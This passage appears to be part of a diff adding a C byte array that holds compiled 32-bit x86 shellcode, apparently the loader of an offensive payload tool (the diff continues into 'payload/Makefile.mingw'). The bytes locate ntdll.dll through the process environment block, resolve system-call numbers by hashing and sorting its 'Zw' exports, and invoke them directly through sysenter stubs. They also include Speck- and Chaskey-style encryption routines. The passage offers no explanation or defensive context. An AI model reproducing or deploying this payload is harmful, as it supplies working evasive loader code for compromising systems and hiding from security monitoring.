1831 0xbe, 0xc8, 0x89, 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb,
1832 0x27, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2,
1833 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74,
1834 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1835 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1836 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc5,
1837 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1838 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0xc7, 0x45,
1839 0xfc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26,
1840 0xeb, 0x24, 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x8b,
1841 0x55, 0x08, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45, 0xf6, 0x0f,
1842 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01, 0xd0, 0x31,
1843 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0xfc, 0x01, 0xd0, 0x0f, 0xb6,
1844 0x00, 0x84, 0xc0, 0x75, 0xcd, 0x8b, 0x45, 0xf8, 0xc9, 0xc3, 0x55, 0x89,
1845 0xe5, 0x53, 0x83, 0xec, 0x64, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x85, 0xc0,
1846 0x74, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe1, 0x02, 0x00, 0x00,
1847 0xc7, 0x45, 0xac, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xac, 0x64, 0x8b,
1848 0x00, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x89, 0x45, 0xdc, 0x8b, 0x45,
1849 0xdc, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xf8, 0x00, 0x00,
1850 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8,
1851 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf0, 0xe9, 0x82, 0x00, 0x00, 0x00, 0x8b,
1852 0x45, 0xf0, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x89,
1853 0x45, 0xd4, 0x8b, 0x45, 0xd4, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1854 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xd0, 0x83, 0xc0, 0x78,
1855 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x8b, 0x00, 0x89, 0x45, 0xc8, 0x83,
1856 0x7d, 0xc8, 0x00, 0x74, 0x40, 0x8b, 0x55, 0xf4, 0x8b, 0x45, 0xc8, 0x01,
1857 0xd0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x0c, 0x8b, 0x45,
1858 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0xc4, 0x8b, 0x00, 0x0d,
1859 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x19, 0x8b,
1860 0x45, 0xc4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20, 0x20, 0x20, 0x20,
1861 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x1e, 0xeb, 0x04, 0x90, 0xeb, 0x01,
1862 0x90, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf0,
1863 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xeb,
1864 0x01, 0x90, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1865 0x00, 0xe9, 0x03, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18,
1866 0x89, 0x45, 0xec, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0xf4,
1867 0x01, 0xd0, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x20, 0x8b,
1868 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b, 0x45, 0xf8, 0x8b, 0x50,
1869 0x24, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0xc7, 0x45, 0xe8,
1870 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1871 0xb4, 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85,
1872 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xbc, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1873 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x0f, 0xb7,
1874 0x00, 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x60, 0x8b, 0x45, 0xe8, 0x8d, 0x14,
1875 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x8d, 0x1c, 0x02, 0x8b,
1876 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0x32, 0xfe, 0xff, 0xff, 0x89, 0x03,
1877 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
1878 0x45, 0xb8, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
1879 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x01, 0xd0, 0x8b, 0x55,
1880 0xe8, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01,
1881 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe8, 0x01, 0x81, 0x7d,
1882 0xe8, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d, 0xec, 0x01, 0x83,
1883 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x68, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90,
1884 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe8, 0x89, 0x10, 0xc7, 0x45, 0xe4, 0x00,
1885 0x00, 0x00, 0x00, 0xe9, 0xfb, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe0, 0x00,
1886 0x00, 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d,
1887 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b,
1888 0x50, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x0c, 0xc5, 0x00,
1889 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
1890 0xc2, 0x0f, 0x86, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d, 0x14,
1891 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x00,
1892 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xe0, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1893 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x45, 0xa4,
1894 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1895 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c, 0xd5,
1896 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x00, 0x89,
1897 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00,
1898 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c,
1899 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x40,
1900 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14,
1901 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45,
1902 0xa0, 0x89, 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5,
1903 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45, 0xa4,
1904 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1905 0x2b, 0x45, 0xe4, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe0, 0x0f, 0x82, 0x15,
1906 0xff, 0xff, 0xff, 0x83, 0x45, 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1907 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe4, 0x0f, 0x82, 0xf4, 0xfe, 0xff, 0xff,
1908 0xb8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1909 0xe5, 0x83, 0xec, 0x14, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0xff,
1910 0xff, 0xff, 0xff, 0xeb, 0x46, 0x8b, 0x45, 0x0c, 0x89, 0x04, 0x24, 0xe8,
1911 0xe2, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff, 0xff, 0xff,
1912 0xff, 0xeb, 0x30, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18,
1913 0x8b, 0x45, 0x0c, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0, 0x04, 0x39, 0x45,
1914 0x08, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x13, 0x83, 0x45, 0xfc, 0x01,
1915 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x39, 0x45, 0xfc, 0x72, 0xde, 0xb8, 0xff,
1916 0xff, 0xff, 0xff, 0xc9, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x50, 0x68, 0x27,
1917 0x6e, 0x95, 0x32, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1918 0x66, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x2c,
1919 0x50, 0x68, 0x0d, 0x22, 0x5e, 0x03, 0xe8, 0x7b, 0xff, 0xff, 0xff, 0x83,
1920 0xc4, 0x08, 0xe8, 0x4b, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1921 0x44, 0x24, 0x0c, 0x50, 0x68, 0x42, 0xb8, 0xce, 0x9a, 0xe8, 0x60, 0xff,
1922 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x30, 0x01, 0x00, 0x00, 0xc3, 0x90,
1923 0x0f, 0x0b, 0x8b, 0x84, 0x24, 0xc1, 0x00, 0x00, 0x00, 0x50, 0x68, 0x53,
1924 0x91, 0x98, 0xf2, 0xe8, 0x42, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1925 0x12, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x08,
1926 0x50, 0x68, 0xd1, 0xd6, 0x9d, 0x34, 0xe8, 0x27, 0xff, 0xff, 0xff, 0x83,
1927 0xc4, 0x08, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1928 0x44, 0x24, 0x10, 0x50, 0x68, 0x23, 0xe1, 0xbd, 0xe3, 0xe8, 0x0c, 0xff,
1929 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x90,
1930 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x18, 0x50, 0x68, 0x17, 0x15, 0x91, 0x0b,
1931 0xe8, 0xf1, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xc1, 0x00, 0x00,
1932 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x68, 0x15,
1933 0x42, 0xb7, 0x1c, 0xe8, 0xd6, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1934 0xa6, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c,
1935 0x50, 0x68, 0x4b, 0x47, 0xa5, 0x31, 0xe8, 0xbb, 0xfe, 0xff, 0xff, 0x83,
1936 0xc4, 0x08, 0xe8, 0x8b, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1937 0x44, 0x24, 0x14, 0x50, 0x68, 0xef, 0x7f, 0x90, 0x87, 0xe8, 0xa0, 0xfe,
1938 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x70, 0x00, 0x00, 0x00, 0xc3, 0x90,
1939 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30, 0x50, 0x68, 0x2a, 0xfe, 0x9d, 0x24,
1940 0xe8, 0x85, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x55, 0x00, 0x00,
1941 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x39,
1942 0x2b, 0xcf, 0x55, 0xe8, 0x6a, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1943 0x3a, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30,
1944 0x50, 0x68, 0x93, 0x76, 0x29, 0x34, 0xe8, 0x4f, 0xfe, 0xff, 0xff, 0x83,
1945 0xc4, 0x08, 0xe8, 0x1f, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1946 0x44, 0x24, 0x10, 0x50, 0x68, 0xf7, 0xc9, 0xac, 0xff, 0xe8, 0x34, 0xfe,
1947 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xc3, 0x90,
1948 0x0f, 0x0b, 0x89, 0xe2, 0x0f, 0x34, 0xc3, 0x90, 0x0f, 0x0b, 0x90, 0x90,
1949 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xd8,
1950 0x8b, 0x45, 0x10, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xd8, 0x8b, 0x55, 0xdc,
1951 0x89, 0x45, 0xe0, 0x89, 0x55, 0xe4, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
1952 0x00, 0xeb, 0x1c, 0x8b, 0x45, 0xfc, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1953 0x00, 0x8b, 0x45, 0x08, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x89,
1954 0x54, 0x85, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
1955 0xde, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b, 0x45,
1956 0xe0, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe4, 0x01, 0xc2, 0x8b,
1957 0x45, 0xe8, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0xc1, 0xc0,
1958 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xe4, 0x8b,
1959 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xec, 0xc1, 0xc8, 0x08, 0x89,
1960 0xc2, 0x8b, 0x45, 0xe8, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45, 0xf4,
1961 0x8b, 0x45, 0xe8, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xf4, 0x31,
1962 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xec, 0x8b, 0x45,
1963 0xf8, 0x89, 0x45, 0xf0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x1a,
1964 0x76, 0x9c, 0x8b, 0x45, 0xe0, 0x8b, 0x55, 0xe4, 0xc9, 0xc3, 0x55, 0x89,
1965 0xe5, 0x57, 0x56, 0x83, 0xec, 0x50, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xc0,
1966 0x8b, 0x45, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xe0,
1967 0x8b, 0x45, 0xc0, 0x8b, 0x55, 0xc4, 0x89, 0x45, 0xf0, 0x89, 0x55, 0xf4,
1968 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00,
1969 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0f, 0x01,
1970 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
1971 0x00, 0x84, 0xc0, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x40, 0x0f, 0x85, 0x95,
1972 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xe8, 0x89,
1973 0xc2, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x89, 0x54, 0x24,
1974 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24,
1975 0xe8, 0xab, 0xf7, 0xff, 0xff, 0x8d, 0x55, 0xd0, 0x8b, 0x45, 0xe8, 0x01,
1976 0xd0, 0xc6, 0x00, 0x80, 0x83, 0x7d, 0xe8, 0x0b, 0x76, 0x48, 0x8b, 0x45,
1977 0xf0, 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08,
1978 0x8d, 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x99, 0xfe, 0xff, 0xff, 0x89,
1979 0xc1, 0x33, 0x4d, 0xf0, 0x89, 0xce, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1980 0xc7, 0x89, 0x75, 0xf0, 0x89, 0x7d, 0xf4, 0xc7, 0x44, 0x24, 0x08, 0x10,
1981 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d,
1982 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xf7, 0xff, 0xff, 0x8b, 0x45,
1983 0xec, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xe8, 0x10, 0x00,
1984 0x00, 0x00, 0x83, 0x45, 0xe4, 0x01, 0xeb, 0x1f, 0x8b, 0x55, 0xe0, 0x8b,
1985 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8d, 0x4d, 0xd0,
1986 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xe8, 0x01, 0x83,
1987 0x45, 0xec, 0x01, 0x83, 0x7d, 0xe8, 0x10, 0x75, 0x3c, 0x8b, 0x45, 0xf0,
1988 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d,
1989 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x16, 0xfe, 0xff, 0xff, 0x89, 0xc1,
1990 0x33, 0x4d, 0xf0, 0x89, 0x4d, 0xb8, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1991 0x45, 0xbc, 0x8b, 0x45, 0xb8, 0x8b, 0x55, 0xbc, 0x89, 0x45, 0xf0, 0x89,
1992 0x55, 0xf4, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe4,
1993 0x00, 0x0f, 0x84, 0xe7, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x8b, 0x55,
1994 0xf4, 0x83, 0xc4, 0x50, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53,
1995 0x83, 0xec, 0x10, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08,
1996 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39,
1997 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1998 0xf4, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00,
1999 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
2000 0xf8, 0x8d, 0x1c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01,
2001 0xd8, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8,
2002 0x03, 0x76, 0xc1, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xee,
2003 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83,
2004 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x89, 0x10, 0x8b,
2005 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1,
2006 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31,
2007 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b,
2008 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2009 0x08, 0x01, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b,
2010 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08,
2011 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10,
2012 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b, 0x45, 0xf4, 0x83,
2013 0xc0, 0x04, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x01, 0xca,
2014 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2,
2015 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45,
2016 0xf4, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1,
2017 0xc0, 0x0d, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4,
2018 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2019 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83,
2020 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31, 0xca,
2021 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45,
2022 0xf4, 0x83, 0xc0, 0x08, 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xf8,
2023 0x01, 0x83, 0x7d, 0xf8, 0x0f, 0x0f, 0x86, 0x08, 0xff, 0xff, 0xff, 0xc7,
2024 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39, 0x8b, 0x45, 0xf8, 0x8d,
2025 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x8b,
2026 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
2027 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x85,
2028 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31, 0xca, 0x89,
2029 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x03, 0x76, 0xc1, 0x90,
2030 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
2031 0x28, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x0c, 0x89, 0x45,
2032 0xf0, 0xe9, 0xbd, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00,
2033 0x00, 0xeb, 0x19, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f,
2034 0xb6, 0x00, 0x8d, 0x4d, 0xdc, 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02,
2035 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe1, 0x8d, 0x45,
2036 0xdc, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
2037 0x00, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0x14, 0xba, 0x10, 0x00, 0x00, 0x00,
2038 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf4, 0x00,
2039 0x00, 0x00, 0x00, 0xeb, 0x26, 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf4, 0x01,
2040 0xd0, 0x0f, 0xb6, 0x08, 0x8d, 0x55, 0xdc, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
2041 0x0f, 0xb6, 0x10, 0x8b, 0x5d, 0xf8, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31,
2042 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45,
2043 0xec, 0x72, 0xd2, 0x8b, 0x45, 0xec, 0x29, 0x45, 0x14, 0x8b, 0x45, 0xec,
2044 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x20,
2045 0x8b, 0x45, 0xf4, 0x8d, 0x50, 0xff, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x0f,
2046 0xb6, 0x10, 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
2047 0x74, 0x02, 0xeb, 0x0b, 0x83, 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85,
2048 0xc0, 0x7f, 0xd9, 0x83, 0x7d, 0x14, 0x00, 0x0f, 0x85, 0x39, 0xff, 0xff,
2049 0xff, 0x90, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0xff, 0xff, 0xff, 0xff,
2050 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00};
2051
+0
-12
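--- a/payload/Makefile.mingw
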